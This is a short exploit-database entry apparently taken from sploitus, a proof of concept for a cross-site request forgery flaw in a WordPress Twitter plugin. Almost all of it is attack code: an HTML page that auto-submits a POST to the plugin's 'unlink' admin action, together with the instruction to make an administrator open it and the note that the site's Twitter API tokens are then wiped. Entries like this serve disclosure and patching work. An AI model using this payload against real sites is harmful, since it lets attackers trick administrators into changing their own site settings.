## https://sploitus.com/exploit?id=WPEX-ID:C59A8B49-6F3E-452B-BA9B-50B80C522EE9
Make an admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="http://example.com/wp-admin/admin.php?page=hl_twitter_settings&action=unlink" method="POST">
<input type="submit" name="submit" value="Unlink" class="button-primary">
</form>
</body>
```
The Twitter connection will be removed (API tokens reset to `''`)